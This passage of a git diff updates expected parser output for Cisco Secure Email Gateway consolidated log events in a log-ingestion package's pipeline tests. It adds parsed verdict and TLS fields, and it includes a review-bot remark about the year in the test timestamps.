3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}} +<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway 
Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\"Zander, Petra Petra.Zander at druseidt.de\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 
'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 
'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}} diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json index bf784b619dc..96e9025dc6b 100644 
--- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json @@ -1115,6 +1115,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "NEGATIVE", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", "delivery_connection_id": "3036000", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1141,7 +1145,7 @@ "out": { "cipher": "ECDHE-RSA-AES256-GCM-SHA384", "connection_status": "Success", - "protocol": "TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + "protocol": "TLSv1.2" } } }, @@ -1231,7 +1235,11 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "FA_PENDING", + "as_verdict": "NEGATIVE", "attachment_details": "{'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}}", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", "dlp_verdict": "NOT_EVALUATED", "final_action_details": "Message held temporarily in Delay Quarantine", "friendly_from": "River ", @@ -1246,7 +1254,14 @@ "msg_size": 18675, "outbreak_filter_verdict": "NEGATIVE", "sdr_consolidated_domain_age": "30 days (or greater)", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" 
@@ -1255,7 +1270,7 @@ "listener": { "name": "IncomingMail" }, - "message": "'Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=E7DEF468022C4EB09683-9A331A42E1F7 ESAMID=54376810 ESAICID=43587623 endTime=Tue Jul 4 06:21:54 2023 ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAAttachmentDetails={'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}} ESAFriendlyFrom=River ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 16:12:44 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=river@this.example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=New Zealand ESAMFVerdict=MATCH act=DQ ESAFinalActionDetails=Message held temporarily in Delay Quarantine cs4Label=ExternalMsgID cs4='<2403354681.734500.1688449973515.mail.lion@example.com>' ESAMsgSize=18675 ESAOFVerdict=NEGATIVE duser=smith@example.com ESAHeloDomain=vm-lion.dmz ESAHeloIP=89.160.20.128 cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}} sourceHostName=company.example.com sourceAddress=89.160.20.128 msg='Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" } }, "ecs": { 
@@ -1268,6 +1283,7 @@ ] }, "message_id": "54376810", + "subject": "Accept: Cisco - SOLUTIONS", "to": { "address": [ "smith@example.com" @@ -1335,6 +1351,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", "delivery_connection_id": "34809573", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1352,7 +1372,14 @@ "outbreak_filter_verdict": "NEGATIVE", "sdr_consolidated_domain_age": "30 days (or greater)", "sender_group": "ACCEPTLIST", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" 
@@ -1361,7 +1388,7 @@ "listener": { "name": "IncomingMail" }, - "message": "'IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=30543A3AB9E54FA8AAC1-FB812C95028D ESAMID=238746 ESAICID=435897324 ESADCID=34809573 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.142 ESAFriendlyFrom=Will ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 15:14:29 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=irobot@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='' ESAMsgSize=12312 ESAOFVerdict=NEGATIVE duser=alfombra@example.com ESAHeloDomain=mail-q6by9-a42.google.com ESAHeloIP=81.2.69.192 cfp1Label=SBRSScore cfp1=2.7 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}} sourceHostName=mail-q6by9-a42.google.com ESASenderGroup=ACCEPTLIST sourceAddress=81.2.69.192 msg='IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" } }, "ecs": { @@ -1374,6 +1401,7 @@ ] }, "message_id": "238746", + "subject": "IE : Crayons", "to": { "address": [ "alfombra@example.com" 
@@ -1440,6 +1468,127 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", + "delivery_connection_id": "970897", + "dkim_verdict": "pass", + "dlp_verdict": "NOT_EVALUATED", + "final_action_details": "To SPAM", + "friendly_from": "Beaches ", + "graymail_verdict": "NEGATIVE", + "helo": { + "domain": "example.com", + "ip": "89.160.20.112" + }, + "injection_connection_id": "35635425", + "mail_flow_policy": "ACCEPT", + "mf_verdict": "MATCH", + "msg_size": 20668, + "outbreak_filter_verdict": "NEGATIVE", + "reply_to": "lane@example.com", + "sdr_consolidated_domain_age": "30 days (or greater)", + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } + }, + "event": { + "name": "Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "IncomingMail" + }, + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com 
ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "westinghouse-thoreau\\\\=example.com@example.com" + ] + }, + "message_id": "786324", + "subject": "Totally not suspicious email subject", + "to": { + "address": [ + "thoreau@example.com" + ] + } + }, + "event": { + "end": "2023-07-04T06:21:54.000Z", + "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) 
cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", + "severity": "5", + "start": "2023-07-04T14:42:34.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4FEF3A4372664BCCB404-20EE1767D434" + }, + "log": { + "syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "89.160.20.112", + "81.2.69.144" + ] + }, + "source": { + "domain": "example.com", + "ip": "89.160.20.112" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + "cisco_secure_email_gateway": { + "log": { + "act": "QUARANTINED", + "appliance": { + "product": "C100V Email Security Virtual Appliance", + "vendor": "Cisco", + "version": "14.3.0-032" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "NZ", + "cs2_label": "SenderCountry", + "cs3": "N/A", + "cs3_label": "SDRThreatCategory", + "cs4": "490b2a15fa4742331779cdaa4e@example.com", + "cs4_label": "ExternalMsgID", + "cs6": "Neutral", + "cs6_label": "SDRRepScore", + "data": { + "ip": "81.2.69.144" + }, + "device_direction": "incoming", + "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", "delivery_connection_id": "970897", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", 
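Review bot: The new document's `"@timestamp": "2024-07-04T06:21:54.000Z"` is not derivable from the event itself: its `event.original` header `<14>Jul 04 06:21:54` carries no year, while the parsed `event.start`/`event.end` are in 2023. If the year is filled in from the test run date rather than pinned in the pipeline test config, this expected file will start failing at the next year boundary; if it is pinned, stating the pinned value in the test config would save the next maintainer the question. The same 2024 `@timestamp` appears on the outgoing-direction document added in the hunk starting at `@@ -1766,6 +1928,249 @@`, which continues past the end of this view.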
@@ -1457,16 +1606,24 @@ "outbreak_filter_verdict": "NEGATIVE", "reply_to": "lane@example.com", "sdr_consolidated_domain_age": "30 days (or greater)", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" }, "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "host": "test.hostname.co", "listener": { "name": "IncomingMail" }, - "message": "\\\"Totally not suspicious email subject\\\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) 
cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" } }, "ecs": { @@ -1479,6 +1636,7 @@ ] }, "message_id": "786324", + "subject": "Totally not suspicious email subject", "to": { "address": [ "thoreau@example.com" 
@@ -1488,7 +1646,7 @@ "event": { "end": "2023-07-04T06:21:54.000Z", "kind": "event", - "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\\\"Totally not suspicious email subject\\\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", + "original": "<14>Jul 04 06:21:54 test.hostname.co consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 
ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", "severity": "5", "start": "2023-07-04T14:42:34.000Z", "timezone": "UTC" @@ -1537,7 +1695,7 @@ "cs2_label": "SenderCountry", "cs3": "N/A", "cs3_label": "SDRThreatCategory", - "cs4_label": "ExternalMsgID cs4=''", + "cs4_label": "ExternalMsgID", "cs6": "Favorable", "cs6_label": "SDRRepScore", "data": { @@ -1545,6 +1703,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "NEGATIVE", + "av_verdict": "NEGATIVE", + "content_filter_verdict": "NOT_EVALUATED", "delivery_connection_id": "23876232", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1571,7 +1733,7 @@ "out": { "cipher": "ECDHE-RSA-AES256-GCM-SHA384", "connection_status": "Success", - "protocol": "TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NEGATIVE ESACFVerdict=NOT_EVALUATED" + "protocol": "TLSv1.2" } } }, 
